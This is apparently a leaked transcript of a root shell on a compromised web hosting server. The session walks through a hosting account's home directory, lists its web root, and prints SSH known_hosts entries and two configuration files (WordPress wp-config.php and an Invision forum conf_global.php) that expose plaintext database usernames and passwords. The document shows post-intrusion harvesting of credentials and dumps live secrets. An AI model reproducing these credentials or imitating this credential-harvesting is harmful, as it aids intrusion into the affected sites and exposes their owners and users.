-rw-r--r--  1 root root  592843 Mar  6	2006 wget-1.10.2-3.2.1.i386.rpm
root@web02 [~]# ls -la .ssh/
total 16
drwx------  2 root root 4096 Jul 11  2008 ./
drwxr-x--- 21 root root 4096 Jul 12 05:19 ../
-rw-r--r--  1 root root  887 Dec 12  2008 known_hosts
root@web02 [~]# cat .ssh/known_hosts
10.4.74.66 ssh-rsa
AAAAB3NzaC1yc2EAAAABIwAAAIEA02i+j1KuL7HZBmcnFrffWTQ/l13ntH+CEl375sBKgl3Fb2ruCIy
QSdvMEZWo33Ksr7gEAV3XHPXPrYKFcBFGVNIMWQb3RRrP2vYMQrJahj5NJM+vpTNQZlLBLBkRjGob39
CEcJYqNFqL4MuUffIWAmi/B0g28Dmt0Dbn1SWi/4U=
web01.divergentnetworks.com,75.126.14.26 ssh-rsa
AAAAB3NzaC1yc2EAAAABIwAAAIEA02i+j1KuL7HZBmcnFrffWTQ/l13ntH+CEl375sBKgl3Fb2ruCIy
QSdvMEZWo33Ksr7gEAV3XHPXPrYKFcBFGVNIMWQb3RRrP2vYMQrJahj5NJM+vpTNQZlLBLBkRjGob39
CEcJYqNFqL4MuUffIWAmi/B0g28Dmt0Dbn1SWi/4U=
divergentnetworks.com,75.126.127.95 ssh-rsa
AAAAB3NzaC1yc2EAAAABIwAAAQEAu1ITHGT2KP71if7/lSARz8gpJG5LtKb41VofU0ibjg20aVlXDtr
7zejC4AVczjCB1ZzK9H0+8Nn61IEOuKbIviRlCChvXQAXXp0yxbtKPvBjV//V/S7uN0HnfyLCO+dMdP
HeDtJ+eCKIYTudz6IhPptBvghCCfUB7cqrxfsWC/+Aj3JZnQkgGTq9Sjut+9YCrGtERykxkSdIVjnev
ZxBU5xTt412qTGdmlVLWt5p8QVxd8hGW7EaiGTcGGvwu8MiN0hR6Q35BcvqYHjUuF0hc2gpQ6Tu5ruU
0VAd9Zf3AWXsFBtf8ea6RFUpnXza5g+w2OmwEf/Mg7EuV3IafiLlUQ==
root@web02 [~]# cd /home2/hak5/
root@web02 [/home2/hak5]# ls -la
total 173932
drwx--x--x 25 hak5   hak5	 4096 Jul  2 21:26 ./
drwx--x--x 38 root   root	 4096 Jun 18 00:22 ../
lrwxrwxrwx  1 hak5   hak5	   30 Jul 22  2008 access-logs ->
/usr/local/apache/domlogs/hak5/
lrwxrwxrwx  1 hak5   hak5	   10 Jul 22  2008 anon_ftp -> public_ftp/
-rw-------  1 hak5   hak5	 1544 May  1 19:27 .bash_history
-rw-r--r--  1 hak5   hak5	   24 Feb 22  2008 .bash_logout
-rw-r--r--  1 hak5   hak5	  191 Feb 22  2008 .bash_profile
-rw-r--r--  1 hak5   hak5	  124 Feb 22  2008 .bashrc
lrwxrwxrwx  1 hak5   hak5	   19 Jul 22  2008 cgi-bin ->
public_html/cgi-bin/
drwxr-x---  2 hak5   hak5	 4096 Feb  7  2008 conf/
-rw-------  1 hak5   hak5	    0 Feb 22  2008 .contactemail
drwx------  5 hak5   hak5	 4096 Feb 24  2008 .cpanel/
drwxr-xr-x  4 hak5   hak5	 4096 Nov 29  2008 cpanel3-skel/
-rw-r-----  1 hak5   hak5	    1 Jun  8 11:48 cpbackup-exclude.conf
drwxr-xr-x  3 hak5   hak5	 4096 Jul 21  2008 cpmove.psql/
drwxr-xr-x  2 hak5   hak5	 4096 Feb 22  2008 cpmove.psql.1216697313/
-rw-r--r--  1 hak5   hak5	    8 May  1 19:27 .dns
-rw-r--r--  1 hak5   hak5	  383 Feb 22  2008 .emacs
drwxr-xr-x  2 hak5   hak5	 4096 Feb 22  2008 error_docs/
drwxr-x---  3 hak5   mail	 4096 Aug 19  2008 etc/
-rw-------  1 hak5   hak5	   17 Jun 24 03:14 .ftpquota
-rw-r--r--  1 hak5   hak5   146463861 Jul 22  2008 hak5_hak5wiki.sql
-rwxrwxrwx  1 hak5   hak5	   19 Apr 23  2007 .htpasswd*
drwxr-x---  2 hak5   nobody	 4096 Jul 21  2008 .htpasswds/
-rw-r--r--  1 hak5   hak5	 5389 Jun  1  2007 httpd.config.old
drwxr-x---  7 hak5   hak5	 4096 Apr 25  2007 httpsdocs/
-rw-r--r--  1 hak5   hak5	    7 Jul 21  2008 .lang
-rw-------  1 hak5   hak5	   14 Jul  2 21:26 .lastlogin
-rw-------  1 hak5   hak5	   35 Feb 24 18:23 .lesshst
drwxrwx---  6 hak5   hak5	 4096 Jul  1 03:16 mail/
drwxr-xr-x  4 hak5   hak5	 4096 Jul 21  2008 .mozilla/
drwxr-x---  2 hak5   hak5	 4096 Apr 23  2007 pd/
drwx------  2 hak5   hak5	 4096 Dec 22  2007 private/
drwxr-x---  5 hak5   hak5	 4096 Aug 20  2008 public_ftp/
drwxr-xr-x 64 hak5   nobody	 4096 Jul  9 12:10 public_html/
drwxr-xr-x  3 hak5   hak5	 4096 Aug 20  2008 rev3/
-rw-r--r--  1 hak5   hak5    31233829 Sep  6  2008 sbbs.rar
dr-xr-x---  7 hak5   hak5	 4096 Apr 22  2007 statistics/
drwxr-xr-x  5 hak5   hak5	 4096 Mar 19  2008 subdomains/
-rw-r--r--  1 hak5   hak5	50886 Mar  4  2008 test
drwxrwxrwt 34 hak5   hak5	 4096 Mar 16 00:14 tmp/
drwx------  2 hak5   hak5	 4096 May 15  2008 .trash/
drwxr-xr-x  3 hak5   hak5	 4096 Dec 21  2007 usr/
drwxr-xr-x  2 hak5   hak5	 4096 Apr 22  2007 web_users/
lrwxrwxrwx  1 hak5   hak5	   11 Jul 22  2008 www -> public_html/
-rw-r--r--  1 hak5   hak5	  658 Feb 22  2008 .zshrc
drwxrwxrwx 25 nobody nobody	 4096 Jun 24 14:51 zz/
root@web02 [/home2/hak5]# ls -la .mozilla/
total 16
drwxr-xr-x  4 hak5 hak5 4096 Jul 21  2008 ./
drwx--x--x 25 hak5 hak5 4096 Jul  2 21:26 ../
drwxr-xr-x  2 hak5 hak5 4096 Jul 21  2008 extensions/
drwxr-xr-x  2 hak5 hak5 4096 Jul 21  2008 plugins/
root@web02 [/home2/hak5]# ls -la rev3
total 16
drwxr-xr-x  3 hak5 hak5 4096 Aug 20  2008 ./
drwx--x--x 25 hak5 hak5 4096 Jul  2 21:26 ../
-rw-------  1 hak5 hak5   13 Jun 22 03:14 .ftpquota
drwxr-xr-x  3 hak5 hak5 4096 Aug 19  2008 promoREV3/
root@web02 [/home2/hak5]# cd www/
root@web02 [/home2/hak5/www]# ls -la
total 104412
drwxr-xr-x  2 hak5 hak5       4096 Dec 22  2007 ~/
drwxr-xr-x 64 hak5 nobody     4096 Jul	9 12:10 ./
drwx--x--x 25 hak5 hak5       4096 Jul	2 21:26 ../
-rw-r-xr-x  1 hak5 hak5 	19 May	5 14:43 1nfo.php*
drwxr-xr-x  2 hak5 hak5       4096 May 18  2007 2x01s1/
-rw-r-xr-x  1 hak5 hak5       1010 Apr 22  2007 400.shtml*
-rw-r-xr-x  1 hak5 hak5        953 Apr 22  2007 403.shtml*
-rw-r-xr-x  1 hak5 hak5        954 Apr 22  2007 404.shtml*
drwxr-xr-x  2 hak5 hak5       4096 Jan 11 19:57 421/
-rw-r-xr-x  1 hak5 hak5       1256 Apr 22  2007 500.shtml*
drwxr-xr-x  4 hak5 hak5       4096 Aug 16  2007 aardwolf/
drwxr-xr-x  6 hak5 hak5       4096 Mar 29 14:46 ~aardwolf/
drwxr-xr-x  3 hak5 hak5       4096 Nov 26  2008 ads/
drwxr-xr-x  3 hak5 hak5       4096 Jul	2  2008 aping/
drwxr-xr-x  2 hak5 hak5       4096 Feb 16 18:20 broken-flash-player/
drwxr-xr-x  3 hak5 hak5       4096 Feb 22  2008 cgi-bin/
drwxr-xr-x  4 hak5 hak5       4096 Apr 28 00:52 chat/
drwxr-xr-x  2 hak5 hak5       4096 Aug 27  2007 comic/
-rw-r-xr-x  1 hak5 hak5        219 Feb 14  2008 crossdomain.xml*
drwxr-xr-x  2 hak5 hak5       4096 Apr 22  2007 css/
drwxr-xr-x  2 hak5 hak5       4096 Jul 28  2008 darren/
-rw-r-xr-x  1 hak5 hak5     434127 Apr	3  2008 digsby.jpg*
drwxr-xr-x  7 hak5 hak5       4096 Jan 17  2008 docuwiki/
drwxr-xr-x  3 hak5 hak5       4096 May	4  2007 e/
-rw-r-xr-x  1 hak5 hak5 	 7 Apr 29 09:51 eggs.txt*
drwxr-xr-x  2 hak5 hak5       4096 Apr 26 15:33 episodes/
drwxr-xr-x  2 hak5 hak5       4096 Jan	9  2008 eps/
drwxr-xr-x  2 hak5 hak5       4096 Dec	2  2008 evilserver/
-rw-r-xr-x  1 hak5 hak5       6894 Apr 23  2007 favicon.ico*
drwxr-xr-x  2 hak5 hak5       4096 Apr 15 11:24 files/
-rw-r-xr-x  1 hak5 hak5     132711 Feb 14  2006 FlashIRCChat.swf*
drwxr-xr-x  2 hak5 hak5       4096 Sep	9  2008 fon/
drwxr-xr-x 22 hak5 hak5       4096 Jun 28 19:51 forums/
drwxr-xr-x 20 hak5 hak5       4096 Oct	6  2008 forums_backup/
-rw-r-xr-x  1 hak5 hak5   96263988 Apr 22 16:35
Hak5--all-themes-and-bumpers.zip*
-rw-r-xr-x  1 hak5 hak5     116237 Aug 15  2008 hak5black.jpg*
-rw-r-xr-x  1 hak5 hak5      58410 Sep 10  2008 hak5--stickers2.jpg*
drwxr-xr-x  2 hak5 hak5       4096 Nov 19  2008 HakHouseCamSetup/
-rw-r-xr-x  1 hak5 hak5        864 Oct	8  2007 hitachi.html*
-rw-r-xr-x  1 hak5 hak5       1859 Jul	9 12:10 .htaccess*
drwxr-xr-x 29 hak5 hak5      12288 Jul	4 09:21 images/
drwxr-xr-x  5 hak5 hak5       4096 Jul 13  2006 img/
-rw-r-xr-x  1 hak5 hak5        347 Apr	1  2008 index.html.aprilfools*
-rw-r-xr-x  1 hak5 hak5        149 Apr 22  2007 index.html.bak*
-rw-r-xr-x  1 hak5 hak5        397 Jun 20 10:49 index.php*
-rw-r-xr-x  1 hak5 hak5 	21 Feb 22  2008 info.php*
-rw-r-xr-x  1 hak5 hak5      13806 Feb 13  2008 IrcClient.swf*
drwxr-xr-x  2 hak5 hak5       4096 Sep 21  2007 jangl/
drwxr-xr-x  2 hak5 hak5       4096 May 11 20:29 js/
-rw-r-xr-x  1 hak5 hak5     121177 Jan 19  2004 kerberos.jpg*
-rw-r-xr-x  1 hak5 hak5      54401 Apr 22  2007 kerby503.jpg*
drwxr-xr-x  2 hak5 hak5       4096 May	5  2007 lanparty/
-rw-r-xr-x  1 hak5 hak5      15410 Jun 20 10:49 license.txt*
drwxr-xr-x  4 hak5 hak5       4096 Jun	4  2007 live00/
-rw-r-xr-x  1 hak5 hak5     373983 Apr	6  2008 logo.psd*
-rw-r-xr-x  1 hak5 hak5    1140360 Sep 27  2008 lp.exe*
-rw-r-xr-x  1 hak5 hak5     296996 Jul	1  2008 mediakit.pdf*
-rw-r-xr-x  1 hak5 hak5      11730 Apr	1  2008 monkey.gif*
-rw-r-xr-x  1 hak5 hak5      47175 Apr	1  2008 monkey.jpg*
drwxr-xr-x  2 hak5 hak5       4096 Aug 26  2007 music/
drwxr-xr-x  2 hak5 hak5       4096 Sep	6  2007 noob/
drwxr-xr-x  3 hak5 hak5       4096 Apr 13  2008 nooblube/
drwxr-xr-x  2 hak5 hak5       4096 Mar 31  2008 omniotaku/
-rw-r-xr-x  1 hak5 hak5     104756 Mar 31  2008 omniotaku.jpg*
drwxr-xr-x  3 hak5 hak5       4096 May	7  2007 packages/
-rw-r-xr-x  1 hak5 hak5        455 Jun 28 19:47 php.ini*
drwxr-xr-x  7 hak5 hak5       4096 Jun 26 19:01 phpMyBackupPro/
drwxr-xr-x  2 hak5 hak5       4096 Apr 22  2007 picture_library/
drwxr-xr-x  2 hak5 hak5       4096 Apr 22  2007 plesk-stat/
drwxr-xr-x  2 hak5 hak5       4096 May	5  2007 poll/
drwxr-xr-x  2 hak5 hak5       4096 May	5  2007 polls/
drwxr-xr-x  2 hak5 hak5       4096 Mar 20 16:21 promo/
-rw-r-xr-x  1 hak5 hak5       7638 Jun 20 10:49 readme.html*
-rw-r--r--  1 hak5 hak5        106 Jun 30 23:29 realdarren.txt
drwxr-xr-x  6 hak5 hak5       4096 Jul 11  2008 releases/
drwxr-xr-x  2 hak5 hak5       4096 May 18  2007 remote/
drwxr-xr-x  2 hak5 hak5       4096 Mar	6 10:25 reserved/
drwxr-xr-x  3 hak5 hak5       4096 Feb 20 00:31 rss/
-rw-r-xr-x  1 hak5 hak5       1202 Apr 29 09:56 rtt.php*
drwxr-xr-x  2 hak5 hak5       4096 May 18  2007 rules/
-rw-r-xr-x  1 hak5 hak5       1712 Dec 29  2008 segment.php*
drwxr-xr-x  2 hak5 hak5       4096 Aug	2  2008 setcam/
drwxr-xr-x 17 hak5 hak5       4096 Jul	2 17:09 shop/
drwxrwxrwx  2 hak5 hak5       4096 Jul	1 14:47 shopp/
drwxr-xr-x  2 hak5 hak5       4096 Sep 26  2008 somethingnew/
drwxr-xr-x 12 hak5 hak5       4096 May	5 16:12 store_2/
drwxr-xr-x 13 hak5 hak5       4096 Jul	2 21:39 store_3/
drwxr-xr-x  2 hak5 hak5       4096 Apr 22  2007 stream/
-rw-r-xr-x  1 hak5 hak5        715 Aug 14  2007 stream.html*
drwxr-xr-x  2 hak5 hak5       4096 Dec 21  2007 stuff/
drwxr-xr-x  2 hak5 hak5       4096 Feb 23  2008 suspended.page/
-rw-r-xr-x  1 hak5 hak5    6817944 Oct 31  2008 telcobobs-stereo.mp4*
drwxr-xr-x  9 hak5 hak5       4096 Jun 30 15:30 temp/
drwxr-xr-x  9 hak5 hak5       4096 Apr 22  2007 test/
-rw-r-xr-x  1 hak5 hak5        830 Dec 12  2008 trivia.php*
-rw-r-xr-x  1 hak5 hak5     100987 Jul	1 12:01 twin.html*
drwxr-xr-x  3 hak5 hak5       4096 Jun 10 10:49 w/
drwxr-xr-x  7 hak5 hak5       4096 Jun 20 10:50 wp-admin/
-rw-r-xr-x  1 hak5 hak5      40543 Jun 20 10:49 wp-app.php*
-rw-r-xr-x  1 hak5 hak5        220 Jun 20 10:49 wp-atom.php*
drwxr-xr-x  2 hak5 hak5       4096 Feb 24 18:03 wpau-backup/
-rw-r-xr-x  1 hak5 hak5        274 Jun 20 10:49 wp-blog-header.php*
-rw-r-xr-x  1 hak5 hak5       3649 Jun 20 10:49 wp-comments-post.php*
-rw-r-xr-x  1 hak5 hak5        238 Jun 20 10:49 wp-commentsrss2.php*
-rw-r-xr-x  1 hak5 hak5        910 Feb 22  2008 wp-config.php*
-rw-r-xr-x  1 hak5 hak5       2626 Jun 20 10:49 wp-config-sample.php*
drwxr-xr-x 13 hak5 hak5       4096 Jul	2 22:40 wp-content/
-rw-r-xr-x  1 hak5 hak5       1254 Jun 20 10:49 wp-cron.php*
-rw-r-xr-x  1 hak5 hak5        220 Jun 20 10:49 wp-feed.php*
drwxr-xr-x  6 hak5 hak5       4096 Jun 20 10:49 wp-includes/
-rw-r-xr-x  1 hak5 hak5       1946 Jun 20 10:49 wp-links-opml.php*
-rw-r-xr-x  1 hak5 hak5       2341 Jun 20 10:49 wp-load.php*
-rw-r-xr-x  1 hak5 hak5      21019 Jun 20 10:49 wp-login.php*
-rw-r-xr-x  1 hak5 hak5       7113 Jun 20 10:49 wp-mail.php*
-rw-r-xr-x  1 hak5 hak5        487 Jun 20 10:49 wp-pass.php*
-rw-r-xr-x  1 hak5 hak5        218 Jun 20 10:49 wp-rdf.php*
-rw-r-xr-x  1 hak5 hak5        316 Jun 20 10:49 wp-register.php*
-rw-r-xr-x  1 hak5 hak5        220 Jun 20 10:49 wp-rss2.php*
-rw-r-xr-x  1 hak5 hak5        218 Jun 20 10:49 wp-rss.php*
-rw-r-xr-x  1 hak5 hak5      21213 Jun 20 10:49 wp-settings.php*
-rw-r-xr-x  1 hak5 hak5       3434 Jun 20 10:49 wp-trackback.php*
-rw-r-xr-x  1 hak5 hak5      92144 Jun 20 10:49 xmlrpc.php*
drwxr-xr-x 11 hak5 hak5       4096 Mar	3  2008 yshout/
root@web02 [/home2/hak5/www]# cat wp-config.php
<?php
// ** MySQL settings ** //
define('DB_NAME', 'hak5_hak5wp');    // The name of the database
define('DB_USER', 'hak5_wp');	  // Your MySQL username
define('DB_PASSWORD', 'hak512qwasZXhak512qwasZX'); // ...and password
define('DB_HOST', 'localhost');    // 99% chance you won't need to change this
value
define('WP_CACHE', true);

// You can have multiple installations in one database if you give each a
unique prefix
$table_prefix  = 'wp_';   // Only numbers, letters, and underscores please!

// Change this to localize WordPress.  A corresponding MO file for the
// chosen language must be installed to wp-includes/languages.
// For example, install de.mo to wp-includes/languages and set WPLANG to 'de'
// to enable German language support.
define ('WPLANG', '');

/* That's all, stop editing! Happy blogging. */

define('ABSPATH', dirname(__FILE__).'/');
require_once(ABSPATH.'wp-settings.php');
?>root@web02 [/home2/hak5/www]# ls -la
total 104412
drwxr-xr-x  2 hak5 hak5       4096 Dec 22  2007 ~/
drwxr-xr-x 64 hak5 nobody     4096 Jul	9 12:10 ./
drwx--x--x 25 hak5 hak5       4096 Jul	2 21:26 ../
-rw-r-xr-x  1 hak5 hak5 	19 May	5 14:43 1nfo.php*
drwxr-xr-x  2 hak5 hak5       4096 May 18  2007 2x01s1/
-rw-r-xr-x  1 hak5 hak5       1010 Apr 22  2007 400.shtml*
-rw-r-xr-x  1 hak5 hak5        953 Apr 22  2007 403.shtml*
-rw-r-xr-x  1 hak5 hak5        954 Apr 22  2007 404.shtml*
drwxr-xr-x  2 hak5 hak5       4096 Jan 11 19:57 421/
-rw-r-xr-x  1 hak5 hak5       1256 Apr 22  2007 500.shtml*
drwxr-xr-x  4 hak5 hak5       4096 Aug 16  2007 aardwolf/
drwxr-xr-x  6 hak5 hak5       4096 Mar 29 14:46 ~aardwolf/
drwxr-xr-x  3 hak5 hak5       4096 Nov 26  2008 ads/
drwxr-xr-x  3 hak5 hak5       4096 Jul	2  2008 aping/
drwxr-xr-x  2 hak5 hak5       4096 Feb 16 18:20 broken-flash-player/
drwxr-xr-x  3 hak5 hak5       4096 Feb 22  2008 cgi-bin/
drwxr-xr-x  4 hak5 hak5       4096 Apr 28 00:52 chat/
drwxr-xr-x  2 hak5 hak5       4096 Aug 27  2007 comic/
-rw-r-xr-x  1 hak5 hak5        219 Feb 14  2008 crossdomain.xml*
drwxr-xr-x  2 hak5 hak5       4096 Apr 22  2007 css/
drwxr-xr-x  2 hak5 hak5       4096 Jul 28  2008 darren/
-rw-r-xr-x  1 hak5 hak5     434127 Apr	3  2008 digsby.jpg*
drwxr-xr-x  7 hak5 hak5       4096 Jan 17  2008 docuwiki/
drwxr-xr-x  3 hak5 hak5       4096 May	4  2007 e/
-rw-r-xr-x  1 hak5 hak5 	 7 Apr 29 09:51 eggs.txt*
drwxr-xr-x  2 hak5 hak5       4096 Apr 26 15:33 episodes/
drwxr-xr-x  2 hak5 hak5       4096 Jan	9  2008 eps/
drwxr-xr-x  2 hak5 hak5       4096 Dec	2  2008 evilserver/
-rw-r-xr-x  1 hak5 hak5       6894 Apr 23  2007 favicon.ico*
drwxr-xr-x  2 hak5 hak5       4096 Apr 15 11:24 files/
-rw-r-xr-x  1 hak5 hak5     132711 Feb 14  2006 FlashIRCChat.swf*
drwxr-xr-x  2 hak5 hak5       4096 Sep	9  2008 fon/
drwxr-xr-x 22 hak5 hak5       4096 Jun 28 19:51 forums/
drwxr-xr-x 20 hak5 hak5       4096 Oct	6  2008 forums_backup/
-rw-r-xr-x  1 hak5 hak5   96263988 Apr 22 16:35
Hak5--all-themes-and-bumpers.zip*
-rw-r-xr-x  1 hak5 hak5     116237 Aug 15  2008 hak5black.jpg*
-rw-r-xr-x  1 hak5 hak5      58410 Sep 10  2008 hak5--stickers2.jpg*
drwxr-xr-x  2 hak5 hak5       4096 Nov 19  2008 HakHouseCamSetup/
-rw-r-xr-x  1 hak5 hak5        864 Oct	8  2007 hitachi.html*
-rw-r-xr-x  1 hak5 hak5       1859 Jul	9 12:10 .htaccess*
drwxr-xr-x 29 hak5 hak5      12288 Jul	4 09:21 images/
drwxr-xr-x  5 hak5 hak5       4096 Jul 13  2006 img/
-rw-r-xr-x  1 hak5 hak5        347 Apr	1  2008 index.html.aprilfools*
-rw-r-xr-x  1 hak5 hak5        149 Apr 22  2007 index.html.bak*
-rw-r-xr-x  1 hak5 hak5        397 Jun 20 10:49 index.php*
-rw-r-xr-x  1 hak5 hak5 	21 Feb 22  2008 info.php*
-rw-r-xr-x  1 hak5 hak5      13806 Feb 13  2008 IrcClient.swf*
drwxr-xr-x  2 hak5 hak5       4096 Sep 21  2007 jangl/
drwxr-xr-x  2 hak5 hak5       4096 May 11 20:29 js/
-rw-r-xr-x  1 hak5 hak5     121177 Jan 19  2004 kerberos.jpg*
-rw-r-xr-x  1 hak5 hak5      54401 Apr 22  2007 kerby503.jpg*
drwxr-xr-x  2 hak5 hak5       4096 May	5  2007 lanparty/
-rw-r-xr-x  1 hak5 hak5      15410 Jun 20 10:49 license.txt*
drwxr-xr-x  4 hak5 hak5       4096 Jun	4  2007 live00/
-rw-r-xr-x  1 hak5 hak5     373983 Apr	6  2008 logo.psd*
-rw-r-xr-x  1 hak5 hak5    1140360 Sep 27  2008 lp.exe*
-rw-r-xr-x  1 hak5 hak5     296996 Jul	1  2008 mediakit.pdf*
-rw-r-xr-x  1 hak5 hak5      11730 Apr	1  2008 monkey.gif*
-rw-r-xr-x  1 hak5 hak5      47175 Apr	1  2008 monkey.jpg*
drwxr-xr-x  2 hak5 hak5       4096 Aug 26  2007 music/
drwxr-xr-x  2 hak5 hak5       4096 Sep	6  2007 noob/
drwxr-xr-x  3 hak5 hak5       4096 Apr 13  2008 nooblube/
drwxr-xr-x  2 hak5 hak5       4096 Mar 31  2008 omniotaku/
-rw-r-xr-x  1 hak5 hak5     104756 Mar 31  2008 omniotaku.jpg*
drwxr-xr-x  3 hak5 hak5       4096 May	7  2007 packages/
-rw-r-xr-x  1 hak5 hak5        455 Jun 28 19:47 php.ini*
drwxr-xr-x  7 hak5 hak5       4096 Jun 26 19:01 phpMyBackupPro/
drwxr-xr-x  2 hak5 hak5       4096 Apr 22  2007 picture_library/
drwxr-xr-x  2 hak5 hak5       4096 Apr 22  2007 plesk-stat/
drwxr-xr-x  2 hak5 hak5       4096 May	5  2007 poll/
drwxr-xr-x  2 hak5 hak5       4096 May	5  2007 polls/
drwxr-xr-x  2 hak5 hak5       4096 Mar 20 16:21 promo/
-rw-r-xr-x  1 hak5 hak5       7638 Jun 20 10:49 readme.html*
-rw-r--r--  1 hak5 hak5        106 Jun 30 23:29 realdarren.txt
drwxr-xr-x  6 hak5 hak5       4096 Jul 11  2008 releases/
drwxr-xr-x  2 hak5 hak5       4096 May 18  2007 remote/
drwxr-xr-x  2 hak5 hak5       4096 Mar	6 10:25 reserved/
drwxr-xr-x  3 hak5 hak5       4096 Feb 20 00:31 rss/
-rw-r-xr-x  1 hak5 hak5       1202 Apr 29 09:56 rtt.php*
drwxr-xr-x  2 hak5 hak5       4096 May 18  2007 rules/
-rw-r-xr-x  1 hak5 hak5       1712 Dec 29  2008 segment.php*
drwxr-xr-x  2 hak5 hak5       4096 Aug	2  2008 setcam/
drwxr-xr-x 17 hak5 hak5       4096 Jul	2 17:09 shop/
drwxrwxrwx  2 hak5 hak5       4096 Jul	1 14:47 shopp/
drwxr-xr-x  2 hak5 hak5       4096 Sep 26  2008 somethingnew/
drwxr-xr-x 12 hak5 hak5       4096 May	5 16:12 store_2/
drwxr-xr-x 13 hak5 hak5       4096 Jul	2 21:39 store_3/
drwxr-xr-x  2 hak5 hak5       4096 Apr 22  2007 stream/
-rw-r-xr-x  1 hak5 hak5        715 Aug 14  2007 stream.html*
drwxr-xr-x  2 hak5 hak5       4096 Dec 21  2007 stuff/
drwxr-xr-x  2 hak5 hak5       4096 Feb 23  2008 suspended.page/
-rw-r-xr-x  1 hak5 hak5    6817944 Oct 31  2008 telcobobs-stereo.mp4*
drwxr-xr-x  9 hak5 hak5       4096 Jun 30 15:30 temp/
drwxr-xr-x  9 hak5 hak5       4096 Apr 22  2007 test/
-rw-r-xr-x  1 hak5 hak5        830 Dec 12  2008 trivia.php*
-rw-r-xr-x  1 hak5 hak5     100987 Jul	1 12:01 twin.html*
drwxr-xr-x  3 hak5 hak5       4096 Jun 10 10:49 w/
drwxr-xr-x  7 hak5 hak5       4096 Jun 20 10:50 wp-admin/
-rw-r-xr-x  1 hak5 hak5      40543 Jun 20 10:49 wp-app.php*
-rw-r-xr-x  1 hak5 hak5        220 Jun 20 10:49 wp-atom.php*
drwxr-xr-x  2 hak5 hak5       4096 Feb 24 18:03 wpau-backup/
-rw-r-xr-x  1 hak5 hak5        274 Jun 20 10:49 wp-blog-header.php*
-rw-r-xr-x  1 hak5 hak5       3649 Jun 20 10:49 wp-comments-post.php*
-rw-r-xr-x  1 hak5 hak5        238 Jun 20 10:49 wp-commentsrss2.php*
-rw-r-xr-x  1 hak5 hak5        910 Feb 22  2008 wp-config.php*
-rw-r-xr-x  1 hak5 hak5       2626 Jun 20 10:49 wp-config-sample.php*
drwxr-xr-x 13 hak5 hak5       4096 Jul	2 22:40 wp-content/
-rw-r-xr-x  1 hak5 hak5       1254 Jun 20 10:49 wp-cron.php*
-rw-r-xr-x  1 hak5 hak5        220 Jun 20 10:49 wp-feed.php*
drwxr-xr-x  6 hak5 hak5       4096 Jun 20 10:49 wp-includes/
-rw-r-xr-x  1 hak5 hak5       1946 Jun 20 10:49 wp-links-opml.php*
-rw-r-xr-x  1 hak5 hak5       2341 Jun 20 10:49 wp-load.php*
-rw-r-xr-x  1 hak5 hak5      21019 Jun 20 10:49 wp-login.php*
-rw-r-xr-x  1 hak5 hak5       7113 Jun 20 10:49 wp-mail.php*
-rw-r-xr-x  1 hak5 hak5        487 Jun 20 10:49 wp-pass.php*
-rw-r-xr-x  1 hak5 hak5        218 Jun 20 10:49 wp-rdf.php*
-rw-r-xr-x  1 hak5 hak5        316 Jun 20 10:49 wp-register.php*
-rw-r-xr-x  1 hak5 hak5        220 Jun 20 10:49 wp-rss2.php*
-rw-r-xr-x  1 hak5 hak5        218 Jun 20 10:49 wp-rss.php*
-rw-r-xr-x  1 hak5 hak5      21213 Jun 20 10:49 wp-settings.php*
-rw-r-xr-x  1 hak5 hak5       3434 Jun 20 10:49 wp-trackback.php*
-rw-r-xr-x  1 hak5 hak5      92144 Jun 20 10:49 xmlrpc.php*
drwxr-xr-x 11 hak5 hak5       4096 Mar	3  2008 yshout/
root@web02 [/home2/hak5/www]# cd forums
root@web02 [/home2/hak5/www/forums]# ls -la
total 5240
drwxr-xr-x 22 hak5 hak5      4096 Jun 28 19:51 ./
drwxr-xr-x 64 hak5 nobody    4096 Jul  9 12:10 ../
drwxr-xr-x  2 hak5 hak5      4096 Jun 29 18:36 admin/
-rw-r-xr-x  1 hak5 hak5      1247 May  9  2008 admin.php*
drwxr-xr-x  4 hak5 hak5      4096 Jun 28 11:06 cache/
-rw-r-xr-x  1 hak5 hak5      1692 May  9  2008 conf_global.php*
-rw-r-xr-x  1 hak5 hak5 	0 May  9  2008 conf_global.php.dist*
drwxr-xr-x  3 hak5 hak5      4096 May  9  2008 converge_local/
-rw-r--r--  1 hak5 hak5   5180310 Jul 12 05:00 error_log
-rw-r-xr-x  1 hak5 hak5      1150 Dec 22  2007 favicon.ico*
drwxr-xr-x  6 hak5 hak5      4096 Oct  6  2008 gallery_setup/
-rw-r-xr-x  1 hak5 hak5     21447 Oct  6  2008 index.php*
-rw-r-xr-x  1 hak5 hak5      9034 Oct  6  2008 init.php*
drwxr-xr-x  3 hak5 hak5      4096 Feb 22  2008 interface/
drwxr-xr-x  7 hak5 hak5      4096 Oct  6  2008 ips_kernel/
drwxr-xr-x  4 hak5 hak5      4096 Oct  6  2008 jscripts/
drwxr-xr-x  2 hak5 hak5      4096 May  9  2008 lofiversion/
drwxr-xr-x  2 hak5 hak5      4096 Oct  6  2008 mod_install/
drwxr-xr-x  2 hak5 hak5      4096 Oct  6  2008 modules/
drwxr-xr-x  4 hak5 hak5      4096 Oct  6  2008 resources/
drwxr-xr-x  2 hak5 hak5      4096 May  9  2008 retail/
drwxr-xr-x  4 hak5 hak5      4096 May  9  2008 skin_acp/
drwxr-xr-x 18 hak5 hak5      4096 Oct  6  2008 sources/
drwxr-xr-x  4 hak5 hak5      4096 May  9  2008 style_avatars/
drwxr-xr-x  4 hak5 hak5      4096 Oct  6  2008 style_captcha/
drwxr-xr-x  3 hak5 hak5      4096 May  9  2008 style_emoticons/
drwxr-xr-x  4 hak5 hak5      4096 Oct  6  2008 style_images/
drwxr-xr-x  6 hak5 hak5      4096 Oct  6  2008 upgrade_2.3.6/
drwxr-xr-x 26 hak5 hak5     36864 Jul 10 22:31 uploads/
root@web02 [/home2/hak5/www/forums]# cat conf_global.php
<?php
$INFO['sql_driver']			=	'mysql';
$INFO['sql_host']			=	'localhost';
$INFO['sql_database']			=	'hak5_ipb';
$INFO['sql_user']			=	'hak5_ipb';
$INFO['sql_pass']			=	'!@qwasZX';
$INFO['sql_tbl_prefix'] 		=	'ibf_';
$INFO['sql_debug']			=	'1';
$INFO['board_start']			=	'1203745701';
$INFO['installed']			=	'1';
$INFO['php_ext']			=	'php';
$INFO['safe_mode']			=	'0';
$INFO['board_url']			=	'http://hak5.org/forums';
$INFO['banned_group']			=	'5';
$INFO['admin_group']			=	'4';
$INFO['guest_group']			=	'2';
$INFO['member_group']			=	'3';
$INFO['auth_group']			=	'1';
$INFO['mysql_tbl_type'] 		=	'MyISAM';
$INFO['conv_chosen']			=	'ipb_conv_smf11';
$INFO['conv_configured']			=	'1';
